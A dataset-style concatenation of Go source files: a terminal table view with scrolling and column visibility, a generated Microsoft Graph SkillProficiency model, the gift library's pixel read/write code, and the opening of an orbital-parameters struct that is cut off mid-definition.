	return true
}
// AddDisabledCol adds the idx'th column to the disabled-column list,
// i.e. makes it invisible.
// NOTE(review): no de-duplication — adding the same index twice stores it
// twice (harmless for IsColEnabled, but NEnabledCols would undercount).
func (t *Table) AddDisabledCol(idx int) {
	t.disabledCols = append(t.disabledCols, idx)
}
// RemoveDisabledCol removes the idx'th column from the disabled-column
// list, i.e. makes it visible again.
func (t *Table) RemoveDisabledCol(idx int) {
	kept := make([]int, 0, len(t.disabledCols))
	for _, col := range t.disabledCols {
		if col == idx {
			continue
		}
		kept = append(kept, col)
	}
	t.disabledCols = kept
}
// SetRowVisibility shows or hides the content row at rowIdx.
// NOTE(review): rowIdx is not bounds-checked — confirm callers pass valid
// indices.
func (t *Table) SetRowVisibility(rowIdx int, visible bool) {
	t.contents[rowIdx].isVisible = visible
}

// SetMatched records the matched substring range [b, e) on cell (r, c)
// for search highlighting.
func (t *Table) SetMatched(r int, c int, b int, e int) {
	t.contents[r].cols[c].matchBegin = b
	t.contents[r].cols[c].matchEnd = e
}

// ResetDisabledCol clears the disabled-column list, making all columns
// visible.
func (t *Table) ResetDisabledCol() {
	t.disabledCols = []int{}
}
// ResetVisibility marks every content row visible again.
func (t *Table) ResetVisibility() {
	for i := range t.contents {
		t.contents[i].isVisible = true
	}
}
// computeWidth returns the total formatted width of the visible columns,
// starting at the current horizontal offset. Cell.width already includes
// padding, so the result is the on-screen width.
func (t *Table) computeWidth() (width int) {
	for i := t.offsetCol; i < len(t.header.cols); i++ {
		if !t.IsColEnabled(i) {
			continue
		}
		width += t.header.cols[i].width
	}
	return width
}
// computeHeight returns the number of visible content rows from the
// current vertical offset, plus 2 for the always-present header and
// separator line.
func (t *Table) computeHeight() (height int) {
	for i := t.offsetRow; i < len(t.contents); i++ {
		if t.contents[i].isVisible {
			height++
		}
	}
	return height + 2
}
// isMovable reports whether the view can scroll in the given direction:
// 0: up, 1: right, 2: down, 3: left.
// Scrolling right/down is possible when the table overflows the screen;
// scrolling left/up is possible when the view is already offset.
// NOTE(review): GetMaxXY is defined elsewhere — presumably the terminal
// size; confirm.
func (t *Table) isMovable(direction int) bool {
	maxX, maxY := GetMaxXY()
	x := t.computeWidth()
	y := t.computeHeight()
	if x >= maxX && direction == 1 {
		// Movable to right and want to move right
		return true
	} else if t.offsetCol > 0 && direction == 3 {
		// Viewing right part and want to move left
		return true
	} else if y > maxY && direction == 2 {
		// Movable down and want to move down
		return true
	} else if t.offsetRow > 0 && direction == 0 {
		// Viewing bottom part and want to move up
		return true
	}
	return false
}
// SetOffsetRow sets the first visible content row (no bounds checking).
func (t *Table) SetOffsetRow(r int) {
	t.offsetRow = r
}
// MoveRight scrolls the view right by move columns, clamped to the total
// number of columns.
func (t *Table) MoveRight(move int) {
	if !t.isMovable(1) {
		return
	}
	t.offsetCol += move
	if t.offsetCol > len(t.header.cols) {
		// Bug fix: clamp offsetCol — the previous code assigned the
		// clamp to offsetRow, leaving offsetCol unbounded and
		// corrupting the vertical offset.
		t.offsetCol = len(t.header.cols)
	}
}
// MoveLeft scrolls the view left by move columns, clamped at column 0.
func (t *Table) MoveLeft(move int) {
	if !t.isMovable(3) {
		return
	}
	next := t.offsetCol - move
	if next < 0 {
		next = 0
	}
	t.offsetCol = next
}
// MoveUp scrolls the view up by move rows (clamped at the top), counting
// invisible (filtered-out) rows above the offset as extra distance so the
// visible content shifts by the requested amount.
func (t *Table) MoveUp(move int) {
	if !t.isMovable(0) {
		return
	}
	// Skip invisible rows. Bug fix: check the index bounds before
	// dereferencing t.contents[i] — the old condition order
	// (!t.contents[i].isVisible && i > 0) indexed first and could panic
	// when offsetRow == len(t.contents).
	for i := t.offsetRow; i > 0 && i < len(t.contents) && !t.contents[i].isVisible; i-- {
		move++
	}
	t.offsetRow -= move
	if t.offsetRow < 0 {
		t.offsetRow = 0
	}
}
// MoveDown scrolls the view down by move rows (clamped at the bottom),
// counting invisible (filtered-out) rows at the offset as extra distance
// so the visible content shifts by the requested amount.
func (t *Table) MoveDown(move int) {
	if !t.isMovable(2) {
		return
	}
	// Skip invisible rows. Bug fix: the bounds check must come before
	// the element access — the old condition order
	// (!t.contents[i].isVisible && i < len(t.contents)) indexed first
	// and panicked once i reached len(t.contents).
	for i := t.offsetRow; i < len(t.contents) && !t.contents[i].isVisible; i++ {
		move++
	}
	t.offsetRow += move
	if t.offsetRow > len(t.contents) {
		t.offsetRow = len(t.contents)
	}
}
func (t *Table) Debugdump() {
fmt.Println("---- Header ----")
for _, cell := range t.header.cols {
fmt.Print(cell.data, " ")
}
fmt.Println("")
fmt.Println("---- Contents -----------")
for _, row := range t.contents {
for _, cell := range row.cols {
fmt.Print(cell.data, " ")
}
fmt.Println("")
}
fmt.Println("maxLen: ", t.maxLen)
} | table.go | 0.673406 | 0.41739 | table.go | starcoder |
package models
import (
i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91 "github.com/microsoft/kiota-abstractions-go/serialization"
)
// SkillProficiency models a user's proficiency with one skill.
// NOTE(review): this file follows the Microsoft Kiota generated-model
// pattern (hash-named serialization import, nil-guarded accessors) —
// presumably machine-generated; confirm before hand-editing broadly.
type SkillProficiency struct {
	ItemFacet
	// Contains categories a user has associated with the skill (for example, personal, professional, hobby).
	categories []string
	// Contains experience scenario tags a user has associated with the interest. Allowed values in the collection are: askMeAbout, ableToMentor, wantsToLearn, wantsToImprove.
	collaborationTags []string
	// Contains a friendly name for the skill.
	displayName *string
	// Detail of the users proficiency with this skill. Possible values are: elementary, limitedWorking, generalProfessional, advancedProfessional, expert, unknownFutureValue.
	proficiency *SkillProficiencyLevel
	// The thumbnailUrl property
	thumbnailUrl *string
	// Contains a link to an information source about the skill.
	webUrl *string
}
// NewSkillProficiency instantiates a new skillProficiency with default
// values, embedding a freshly initialized ItemFacet.
func NewSkillProficiency()(*SkillProficiency) {
	return &SkillProficiency{ItemFacet: *NewItemFacet()}
}
// CreateSkillProficiencyFromDiscriminatorValue creates a new instance of the
// appropriate class based on the discriminator value. This model has no
// subtypes, so the parse node is ignored and a plain SkillProficiency is
// always returned.
func CreateSkillProficiencyFromDiscriminatorValue(parseNode i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.Parsable, error) {
    return NewSkillProficiency(), nil
}
// GetCategories gets the categories property value: categories a user has
// associated with the skill (for example, personal, professional, hobby).
// Returns nil on a nil receiver.
func (m *SkillProficiency) GetCategories()([]string) {
	if m == nil {
		return nil
	}
	return m.categories
}

// GetCollaborationTags gets the collaborationTags property value:
// experience scenario tags associated with the interest. Allowed values:
// askMeAbout, ableToMentor, wantsToLearn, wantsToImprove.
// Returns nil on a nil receiver.
func (m *SkillProficiency) GetCollaborationTags()([]string) {
	if m == nil {
		return nil
	}
	return m.collaborationTags
}

// GetDisplayName gets the displayName property value: a friendly name for
// the skill. Returns nil on a nil receiver.
func (m *SkillProficiency) GetDisplayName()(*string) {
	if m == nil {
		return nil
	}
	return m.displayName
}
// GetFieldDeserializers returns the deserialization functions for this
// model, keyed by JSON property name, extending the map inherited from
// ItemFacet. Each function parses one property from the parse node and
// stores it through the matching setter; absent (nil) values are skipped.
func (m *SkillProficiency) GetFieldDeserializers()(map[string]func(i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode)(error)) {
    // Start from the base-class deserializers and add this type's fields.
    res := m.ItemFacet.GetFieldDeserializers()
    res["categories"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
        val, err := n.GetCollectionOfPrimitiveValues("string")
        if err != nil {
            return err
        }
        if val != nil {
            // Unbox the []interface{} of *string into a []string.
            res := make([]string, len(val))
            for i, v := range val {
                res[i] = *(v.(*string))
            }
            m.SetCategories(res)
        }
        return nil
    }
    res["collaborationTags"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
        val, err := n.GetCollectionOfPrimitiveValues("string")
        if err != nil {
            return err
        }
        if val != nil {
            res := make([]string, len(val))
            for i, v := range val {
                res[i] = *(v.(*string))
            }
            m.SetCollaborationTags(res)
        }
        return nil
    }
    res["displayName"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
        val, err := n.GetStringValue()
        if err != nil {
            return err
        }
        if val != nil {
            m.SetDisplayName(val)
        }
        return nil
    }
    res["proficiency"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
        // Enum values are parsed through the generated parser function.
        val, err := n.GetEnumValue(ParseSkillProficiencyLevel)
        if err != nil {
            return err
        }
        if val != nil {
            m.SetProficiency(val.(*SkillProficiencyLevel))
        }
        return nil
    }
    res["thumbnailUrl"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
        val, err := n.GetStringValue()
        if err != nil {
            return err
        }
        if val != nil {
            m.SetThumbnailUrl(val)
        }
        return nil
    }
    res["webUrl"] = func (n i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.ParseNode) error {
        val, err := n.GetStringValue()
        if err != nil {
            return err
        }
        if val != nil {
            m.SetWebUrl(val)
        }
        return nil
    }
    return res
}
// GetProficiency gets the proficiency property value. Possible values:
// elementary, limitedWorking, generalProfessional, advancedProfessional,
// expert, unknownFutureValue. Returns nil on a nil receiver.
func (m *SkillProficiency) GetProficiency()(*SkillProficiencyLevel) {
	if m == nil {
		return nil
	}
	return m.proficiency
}

// GetThumbnailUrl gets the thumbnailUrl property value.
// Returns nil on a nil receiver.
func (m *SkillProficiency) GetThumbnailUrl()(*string) {
	if m == nil {
		return nil
	}
	return m.thumbnailUrl
}

// GetWebUrl gets the webUrl property value: a link to an information
// source about the skill. Returns nil on a nil receiver.
func (m *SkillProficiency) GetWebUrl()(*string) {
	if m == nil {
		return nil
	}
	return m.webUrl
}
// Serialize writes the current object's properties to the given writer:
// the embedded ItemFacet first, then this type's own fields. Collection
// and enum fields are skipped when nil; scalar string fields are always
// written (the writer handles nil pointers).
func (m *SkillProficiency) Serialize(writer i878a80d2330e89d26896388a3f487eef27b0a0e6c010c493bf80be1452208f91.SerializationWriter)(error) {
    err := m.ItemFacet.Serialize(writer)
    if err != nil {
        return err
    }
    if m.GetCategories() != nil {
        err = writer.WriteCollectionOfStringValues("categories", m.GetCategories())
        if err != nil {
            return err
        }
    }
    if m.GetCollaborationTags() != nil {
        err = writer.WriteCollectionOfStringValues("collaborationTags", m.GetCollaborationTags())
        if err != nil {
            return err
        }
    }
    {
        err = writer.WriteStringValue("displayName", m.GetDisplayName())
        if err != nil {
            return err
        }
    }
    if m.GetProficiency() != nil {
        // Enums are serialized by their string representation.
        cast := (*m.GetProficiency()).String()
        err = writer.WriteStringValue("proficiency", &cast)
        if err != nil {
            return err
        }
    }
    {
        err = writer.WriteStringValue("thumbnailUrl", m.GetThumbnailUrl())
        if err != nil {
            return err
        }
    }
    {
        err = writer.WriteStringValue("webUrl", m.GetWebUrl())
        if err != nil {
            return err
        }
    }
    return nil
}
// SetCategories sets the categories property value. Contains categories a user has associated with the skill (for example, personal, professional, hobby).
func (m *SkillProficiency) SetCategories(value []string)() {
if m != nil {
m.categories = value
}
}
// SetCollaborationTags sets the collaborationTags property value. Contains experience scenario tags a user has associated with the interest. Allowed values in the collection are: askMeAbout, ableToMentor, wantsToLearn, wantsToImprove.
func (m *SkillProficiency) SetCollaborationTags(value []string)() {
if m != nil {
m.collaborationTags = value
}
}
// SetDisplayName sets the displayName property value. Contains a friendly name for the skill.
func (m *SkillProficiency) SetDisplayName(value *string)() {
if m != nil {
m.displayName = value
}
}
// SetProficiency sets the proficiency property value. Detail of the users proficiency with this skill. Possible values are: elementary, limitedWorking, generalProfessional, advancedProfessional, expert, unknownFutureValue.
func (m *SkillProficiency) SetProficiency(value *SkillProficiencyLevel)() {
if m != nil {
m.proficiency = value
}
}
// SetThumbnailUrl sets the thumbnailUrl property value. The thumbnailUrl property
func (m *SkillProficiency) SetThumbnailUrl(value *string)() {
if m != nil {
m.thumbnailUrl = value
}
}
// SetWebUrl sets the webUrl property value. Contains a link to an information source about the skill.
func (m *SkillProficiency) SetWebUrl(value *string)() {
if m != nil {
m.webUrl = value
}
} | models/skill_proficiency.go | 0.590543 | 0.414721 | skill_proficiency.go | starcoder |
package gift
import (
"image"
"image/color"
"image/draw"
)
// pixel is the internal, non-alpha-premultiplied color representation:
// each channel is a float32 nominally in [0, 1].
type pixel struct {
	r, g, b, a float32
}

// imageType enumerates the concrete image kinds that get a direct
// pixel-buffer fast path; itGeneric falls back to the image.Image /
// draw.Image interfaces.
type imageType int

const (
	itGeneric imageType = iota
	itNRGBA
	itNRGBA64
	itRGBA
	itRGBA64
	itYCbCr
	itGray
	itGray16
	itPaletted
)
// pixelGetter reads pixels from an image. Exactly one of the typed image
// fields (matching it) is non-nil; the others are unused. For paletted
// images, palette holds the pre-converted palette entries.
type pixelGetter struct {
	it imageType
	bounds image.Rectangle
	image image.Image
	nrgba *image.NRGBA
	nrgba64 *image.NRGBA64
	rgba *image.RGBA
	rgba64 *image.RGBA64
	gray *image.Gray
	gray16 *image.Gray16
	ycbcr *image.YCbCr
	paletted *image.Paletted
	palette []pixel
}
// newPixelGetter constructs a pixelGetter for img, selecting the
// type-specific fast path when img is one of the known concrete image
// types, and the generic image.Image path otherwise. Paletted images get
// their palette pre-converted to the internal pixel representation.
func newPixelGetter(img image.Image) *pixelGetter {
	switch img := img.(type) {
	case *image.NRGBA:
		return &pixelGetter{
			it: itNRGBA,
			bounds: img.Bounds(),
			nrgba: img,
		}
	case *image.NRGBA64:
		return &pixelGetter{
			it: itNRGBA64,
			bounds: img.Bounds(),
			nrgba64: img,
		}
	case *image.RGBA:
		return &pixelGetter{
			it: itRGBA,
			bounds: img.Bounds(),
			rgba: img,
		}
	case *image.RGBA64:
		return &pixelGetter{
			it: itRGBA64,
			bounds: img.Bounds(),
			rgba64: img,
		}
	case *image.Gray:
		return &pixelGetter{
			it: itGray,
			bounds: img.Bounds(),
			gray: img,
		}
	case *image.Gray16:
		return &pixelGetter{
			it: itGray16,
			bounds: img.Bounds(),
			gray16: img,
		}
	case *image.YCbCr:
		return &pixelGetter{
			it: itYCbCr,
			bounds: img.Bounds(),
			ycbcr: img,
		}
	case *image.Paletted:
		return &pixelGetter{
			it: itPaletted,
			bounds: img.Bounds(),
			paletted: img,
			palette: convertPalette(img.Palette),
		}
	default:
		return &pixelGetter{
			it: itGeneric,
			bounds: img.Bounds(),
			image: img,
		}
	}
}
const (
	// qf8 and qf16 scale 8- and 16-bit channel values into [0, 1].
	qf8 = 1.0 / 0xff
	qf16 = 1.0 / 0xffff
	// epal is the squared-distance threshold below which a palette entry
	// is treated as an exact match (see getPaletteIndex).
	epal = qf16 * qf16 / 2
)
// pixelFromColor converts any color.Color to the internal
// non-premultiplied pixel representation. Color.RGBA returns
// alpha-premultiplied 16-bit channels, so partially transparent colors
// are un-premultiplied by dividing by alpha; fully transparent maps to
// the zero pixel, and fully opaque skips the division.
func pixelFromColor(c color.Color) (px pixel) {
	r16, g16, b16, a16 := c.RGBA()
	if a16 == 0 {
		return pixel{0, 0, 0, 0}
	}
	if a16 == 0xffff {
		return pixel{
			float32(r16) * qf16,
			float32(g16) * qf16,
			float32(b16) * qf16,
			1,
		}
	}
	q := float32(1) / float32(a16)
	return pixel{
		float32(r16) * q,
		float32(g16) * q,
		float32(b16) * q,
		float32(a16) * qf16,
	}
}
// convertPalette converts a color palette to the internal pixel
// representation, preserving entry order.
func convertPalette(p []color.Color) []pixel {
	pal := make([]pixel, len(p))
	for i, c := range p {
		pal[i] = pixelFromColor(c)
	}
	return pal
}
// getPaletteIndex returns the index of the palette entry closest to px by
// squared RGBA distance. An entry within epal is returned immediately as
// an exact match; otherwise the nearest entry wins.
func getPaletteIndex(pal []pixel, px pixel) int {
	best := 0
	bestDist := float32(4)
	for i, entry := range pal {
		dr := px.r - entry.r
		dg := px.g - entry.g
		db := px.b - entry.b
		da := px.a - entry.a
		dist := dr*dr + dg*dg + db*db + da*da
		if dist < epal {
			return i
		}
		if dist < bestDist {
			bestDist = dist
			best = i
		}
	}
	return best
}
// getPixel reads the pixel at (x, y) and converts it to the internal
// non-premultiplied representation with float32 channels in [0, 1].
// Known image types take a direct-buffer fast path; anything else falls
// through to the generic color.Color conversion at the end.
func (p *pixelGetter) getPixel(x, y int) pixel {
	switch p.it {
	case itNRGBA:
		// Already non-premultiplied 8-bit; just scale to [0, 1].
		i := p.nrgba.PixOffset(x, y)
		r := float32(p.nrgba.Pix[i+0]) * qf8
		g := float32(p.nrgba.Pix[i+1]) * qf8
		b := float32(p.nrgba.Pix[i+2]) * qf8
		a := float32(p.nrgba.Pix[i+3]) * qf8
		return pixel{r, g, b, a}
	case itNRGBA64:
		// Non-premultiplied 16-bit; channels are stored big-endian.
		i := p.nrgba64.PixOffset(x, y)
		r := float32(uint16(p.nrgba64.Pix[i+0])<<8|uint16(p.nrgba64.Pix[i+1])) * qf16
		g := float32(uint16(p.nrgba64.Pix[i+2])<<8|uint16(p.nrgba64.Pix[i+3])) * qf16
		b := float32(uint16(p.nrgba64.Pix[i+4])<<8|uint16(p.nrgba64.Pix[i+5])) * qf16
		a := float32(uint16(p.nrgba64.Pix[i+6])<<8|uint16(p.nrgba64.Pix[i+7])) * qf16
		return pixel{r, g, b, a}
	case itRGBA:
		// Premultiplied 8-bit: divide out alpha, special-casing fully
		// opaque and fully transparent pixels.
		i := p.rgba.PixOffset(x, y)
		a8 := p.rgba.Pix[i+3]
		switch a8 {
		case 0xff:
			r := float32(p.rgba.Pix[i+0]) * qf8
			g := float32(p.rgba.Pix[i+1]) * qf8
			b := float32(p.rgba.Pix[i+2]) * qf8
			return pixel{r, g, b, 1}
		case 0:
			return pixel{0, 0, 0, 0}
		default:
			q := float32(1) / float32(a8)
			r := float32(p.rgba.Pix[i+0]) * q
			g := float32(p.rgba.Pix[i+1]) * q
			b := float32(p.rgba.Pix[i+2]) * q
			a := float32(a8) * qf8
			return pixel{r, g, b, a}
		}
	case itRGBA64:
		// Premultiplied 16-bit: same un-premultiply logic as itRGBA.
		i := p.rgba64.PixOffset(x, y)
		a16 := uint16(p.rgba64.Pix[i+6])<<8 | uint16(p.rgba64.Pix[i+7])
		switch a16 {
		case 0xffff:
			r := float32(uint16(p.rgba64.Pix[i+0])<<8|uint16(p.rgba64.Pix[i+1])) * qf16
			g := float32(uint16(p.rgba64.Pix[i+2])<<8|uint16(p.rgba64.Pix[i+3])) * qf16
			b := float32(uint16(p.rgba64.Pix[i+4])<<8|uint16(p.rgba64.Pix[i+5])) * qf16
			return pixel{r, g, b, 1}
		case 0:
			return pixel{0, 0, 0, 0}
		default:
			q := float32(1) / float32(a16)
			r := float32(uint16(p.rgba64.Pix[i+0])<<8|uint16(p.rgba64.Pix[i+1])) * q
			g := float32(uint16(p.rgba64.Pix[i+2])<<8|uint16(p.rgba64.Pix[i+3])) * q
			b := float32(uint16(p.rgba64.Pix[i+4])<<8|uint16(p.rgba64.Pix[i+5])) * q
			a := float32(a16) * qf16
			return pixel{r, g, b, a}
		}
	case itGray:
		// Grayscale maps the single channel to r, g and b; alpha is 1.
		i := p.gray.PixOffset(x, y)
		v := float32(p.gray.Pix[i]) * qf8
		return pixel{v, v, v, 1}
	case itGray16:
		i := p.gray16.PixOffset(x, y)
		v := float32(uint16(p.gray16.Pix[i+0])<<8|uint16(p.gray16.Pix[i+1])) * qf16
		return pixel{v, v, v, 1}
	case itYCbCr:
		// Locate the luma sample and the (possibly subsampled) chroma
		// sample for this pixel.
		iy := (y-p.ycbcr.Rect.Min.Y)*p.ycbcr.YStride + (x - p.ycbcr.Rect.Min.X)
		var ic int
		switch p.ycbcr.SubsampleRatio {
		case image.YCbCrSubsampleRatio444:
			ic = (y-p.ycbcr.Rect.Min.Y)*p.ycbcr.CStride + (x - p.ycbcr.Rect.Min.X)
		case image.YCbCrSubsampleRatio422:
			ic = (y-p.ycbcr.Rect.Min.Y)*p.ycbcr.CStride + (x/2 - p.ycbcr.Rect.Min.X/2)
		case image.YCbCrSubsampleRatio420:
			ic = (y/2-p.ycbcr.Rect.Min.Y/2)*p.ycbcr.CStride + (x/2 - p.ycbcr.Rect.Min.X/2)
		case image.YCbCrSubsampleRatio440:
			ic = (y/2-p.ycbcr.Rect.Min.Y/2)*p.ycbcr.CStride + (x - p.ycbcr.Rect.Min.X)
		default:
			ic = p.ycbcr.COffset(x, y)
		}
		// Fixed-point YCbCr -> RGB conversion scaled by 1e5 to stay in
		// int32 arithmetic, then clamped and normalized to [0, 1].
		const (
			max = 255 * 1e5
			inv = 1.0 / max
		)
		y1 := int32(p.ycbcr.Y[iy]) * 1e5
		cb1 := int32(p.ycbcr.Cb[ic]) - 128
		cr1 := int32(p.ycbcr.Cr[ic]) - 128
		r1 := y1 + 140200*cr1
		g1 := y1 - 34414*cb1 - 71414*cr1
		b1 := y1 + 177200*cb1
		r := float32(clampi32(r1, 0, max)) * inv
		g := float32(clampi32(g1, 0, max)) * inv
		b := float32(clampi32(b1, 0, max)) * inv
		return pixel{r, g, b, 1}
	case itPaletted:
		// Palette entries were pre-converted in newPixelGetter.
		i := p.paletted.PixOffset(x, y)
		k := p.paletted.Pix[i]
		return p.palette[k]
	}
	// Generic (slow) path for unknown image types.
	return pixelFromColor(p.image.At(x, y))
}
// getPixelRow fills buf with row y of the image, reusing buf's backing
// storage when possible.
func (p *pixelGetter) getPixelRow(y int, buf *[]pixel) {
	row := (*buf)[:0]
	for x := p.bounds.Min.X; x != p.bounds.Max.X; x++ {
		row = append(row, p.getPixel(x, y))
	}
	*buf = row
}

// getPixelColumn fills buf with column x of the image, reusing buf's
// backing storage when possible.
func (p *pixelGetter) getPixelColumn(x int, buf *[]pixel) {
	col := (*buf)[:0]
	for y := p.bounds.Min.Y; y != p.bounds.Max.Y; y++ {
		col = append(col, p.getPixel(x, y))
	}
	*buf = col
}
// f32u8 rounds val to the nearest integer and clamps it into the uint8
// range [0, 255].
func f32u8(val float32) uint8 {
	x := int64(val + 0.5)
	switch {
	case x > 0xff:
		return 0xff
	case x > 0:
		return uint8(x)
	default:
		return 0
	}
}

// f32u16 rounds val to the nearest integer and clamps it into the uint16
// range [0, 65535].
func f32u16(val float32) uint16 {
	x := int64(val + 0.5)
	switch {
	case x > 0xffff:
		return 0xffff
	case x > 0:
		return uint16(x)
	default:
		return 0
	}
}
// clampi32 clamps val into [min, max].
//
// Bug fix: the previous implementation returned 0 instead of min when
// val <= min, which is wrong for any non-zero lower bound. All in-file
// callers pass min=0, so their behavior is unchanged.
func clampi32(val, min, max int32) int32 {
	if val > max {
		return max
	}
	if val < min {
		return min
	}
	return val
}
// pixelSetter writes pixels to a draw.Image. Exactly one of the typed
// image fields (matching it) is non-nil; the others are unused. For
// paletted images, palette holds the pre-converted palette entries used
// for nearest-color lookup.
type pixelSetter struct {
	it imageType
	bounds image.Rectangle
	image draw.Image
	nrgba *image.NRGBA
	nrgba64 *image.NRGBA64
	rgba *image.RGBA
	rgba64 *image.RGBA64
	gray *image.Gray
	gray16 *image.Gray16
	paletted *image.Paletted
	palette []pixel
}
// newPixelSetter constructs a pixelSetter for img, selecting the
// type-specific fast path when img is one of the known concrete image
// types, and the generic draw.Image path otherwise. Paletted images get
// their palette pre-converted for nearest-color matching in setPixel.
func newPixelSetter(img draw.Image) *pixelSetter {
	switch img := img.(type) {
	case *image.NRGBA:
		return &pixelSetter{
			it: itNRGBA,
			bounds: img.Bounds(),
			nrgba: img,
		}
	case *image.NRGBA64:
		return &pixelSetter{
			it: itNRGBA64,
			bounds: img.Bounds(),
			nrgba64: img,
		}
	case *image.RGBA:
		return &pixelSetter{
			it: itRGBA,
			bounds: img.Bounds(),
			rgba: img,
		}
	case *image.RGBA64:
		return &pixelSetter{
			it: itRGBA64,
			bounds: img.Bounds(),
			rgba64: img,
		}
	case *image.Gray:
		return &pixelSetter{
			it: itGray,
			bounds: img.Bounds(),
			gray: img,
		}
	case *image.Gray16:
		return &pixelSetter{
			it: itGray16,
			bounds: img.Bounds(),
			gray16: img,
		}
	case *image.Paletted:
		return &pixelSetter{
			it: itPaletted,
			bounds: img.Bounds(),
			paletted: img,
			palette: convertPalette(img.Palette),
		}
	default:
		return &pixelSetter{
			it: itGeneric,
			bounds: img.Bounds(),
			image: img,
		}
	}
}
// setPixel writes px (non-premultiplied float channels) to (x, y),
// converting to the destination image's storage format. Out-of-bounds
// coordinates are silently ignored. Premultiplied formats multiply the
// color channels by alpha; grayscale uses the 0.299/0.587/0.114 luma
// weights; paletted images store the nearest palette index.
func (p *pixelSetter) setPixel(x, y int, px pixel) {
	if !image.Pt(x, y).In(p.bounds) {
		return
	}
	switch p.it {
	case itNRGBA:
		i := p.nrgba.PixOffset(x, y)
		p.nrgba.Pix[i+0] = f32u8(px.r * 0xff)
		p.nrgba.Pix[i+1] = f32u8(px.g * 0xff)
		p.nrgba.Pix[i+2] = f32u8(px.b * 0xff)
		p.nrgba.Pix[i+3] = f32u8(px.a * 0xff)
	case itNRGBA64:
		// 16-bit channels are stored big-endian.
		r16 := f32u16(px.r * 0xffff)
		g16 := f32u16(px.g * 0xffff)
		b16 := f32u16(px.b * 0xffff)
		a16 := f32u16(px.a * 0xffff)
		i := p.nrgba64.PixOffset(x, y)
		p.nrgba64.Pix[i+0] = uint8(r16 >> 8)
		p.nrgba64.Pix[i+1] = uint8(r16 & 0xff)
		p.nrgba64.Pix[i+2] = uint8(g16 >> 8)
		p.nrgba64.Pix[i+3] = uint8(g16 & 0xff)
		p.nrgba64.Pix[i+4] = uint8(b16 >> 8)
		p.nrgba64.Pix[i+5] = uint8(b16 & 0xff)
		p.nrgba64.Pix[i+6] = uint8(a16 >> 8)
		p.nrgba64.Pix[i+7] = uint8(a16 & 0xff)
	case itRGBA:
		// Premultiply color channels by alpha for the RGBA format.
		fa := px.a * 0xff
		i := p.rgba.PixOffset(x, y)
		p.rgba.Pix[i+0] = f32u8(px.r * fa)
		p.rgba.Pix[i+1] = f32u8(px.g * fa)
		p.rgba.Pix[i+2] = f32u8(px.b * fa)
		p.rgba.Pix[i+3] = f32u8(fa)
	case itRGBA64:
		fa := px.a * 0xffff
		r16 := f32u16(px.r * fa)
		g16 := f32u16(px.g * fa)
		b16 := f32u16(px.b * fa)
		a16 := f32u16(fa)
		i := p.rgba64.PixOffset(x, y)
		p.rgba64.Pix[i+0] = uint8(r16 >> 8)
		p.rgba64.Pix[i+1] = uint8(r16 & 0xff)
		p.rgba64.Pix[i+2] = uint8(g16 >> 8)
		p.rgba64.Pix[i+3] = uint8(g16 & 0xff)
		p.rgba64.Pix[i+4] = uint8(b16 >> 8)
		p.rgba64.Pix[i+5] = uint8(b16 & 0xff)
		p.rgba64.Pix[i+6] = uint8(a16 >> 8)
		p.rgba64.Pix[i+7] = uint8(a16 & 0xff)
	case itGray:
		i := p.gray.PixOffset(x, y)
		p.gray.Pix[i] = f32u8((0.299*px.r + 0.587*px.g + 0.114*px.b) * px.a * 0xff)
	case itGray16:
		i := p.gray16.PixOffset(x, y)
		y16 := f32u16((0.299*px.r + 0.587*px.g + 0.114*px.b) * px.a * 0xffff)
		p.gray16.Pix[i+0] = uint8(y16 >> 8)
		p.gray16.Pix[i+1] = uint8(y16 & 0xff)
	case itPaletted:
		// Clamp channels to [0, 1] before the nearest-palette search.
		px1 := pixel{
			minf32(maxf32(px.r, 0), 1),
			minf32(maxf32(px.g, 0), 1),
			minf32(maxf32(px.b, 0), 1),
			minf32(maxf32(px.a, 0), 1),
		}
		i := p.paletted.PixOffset(x, y)
		k := getPaletteIndex(p.palette, px1)
		p.paletted.Pix[i] = uint8(k)
	case itGeneric:
		r16 := f32u16(px.r * 0xffff)
		g16 := f32u16(px.g * 0xffff)
		b16 := f32u16(px.b * 0xffff)
		a16 := f32u16(px.a * 0xffff)
		p.image.Set(x, y, color.NRGBA64{r16, g16, b16, a16})
	}
}
func (p *pixelSetter) setPixelRow(y int, buf []pixel) {
for i, x := 0, p.bounds.Min.X; i < len(buf); i, x = i+1, x+1 {
p.setPixel(x, y, buf[i])
}
}
func (p *pixelSetter) setPixelColumn(x int, buf []pixel) {
for i, y := 0, p.bounds.Min.Y; i < len(buf); i, y = i+1, y+1 {
p.setPixel(x, y, buf[i])
}
} | vendor/github.com/disintegration/gift/pixels.go | 0.611614 | 0.459197 | pixels.go | starcoder |
package orbit
import (
"fmt"
)
// OrbitParameter collects the classical (Keplerian) orbital elements plus
// derived quantities. Fields are pointers so that "not provided" (nil) can
// be distinguished from zero; extendParams/baseParams fill in derived and
// default values.
type OrbitParameter struct {
	// MU is the standard gravitational parameter G*M of the central body.
	MU *float64 // G*M earth MU
	// CentralBodyRadius is the radius of the central body (km, per the
	// Apogee/Perigee units below).
	CentralBodyRadius *float64 // // earth radius
	// Apogee defines furthest point to the central body
	Apogee *float64 // km
	// Perigee defines closest point to the central body
	Perigee *float64 // km
	// SemimajorAxis is the sum of the periapsis and apoapsis distances divided by two.
	// For circular orbits, the semimajor axis is the distance between the centers of the bodies, not the distance of the bodies from the center of mass.
	SemimajorAxis *float64
	SemilatusRectum *float64
	// Eccentricity determines the amount by which its orbit around another body deviates from a perfect circle.
	// A value of 0 is a circular orbit, values between 0 and 1 form an elliptic orbit, 1 is a parabolic escape orbit, and greater than 1 is a hyperbola.
	Eccentricity *float64
	// Inclination determines the vertical tilt of the ellipse with respect to the reference plane, measured at the ascending node
	Inclination *float64 // deg
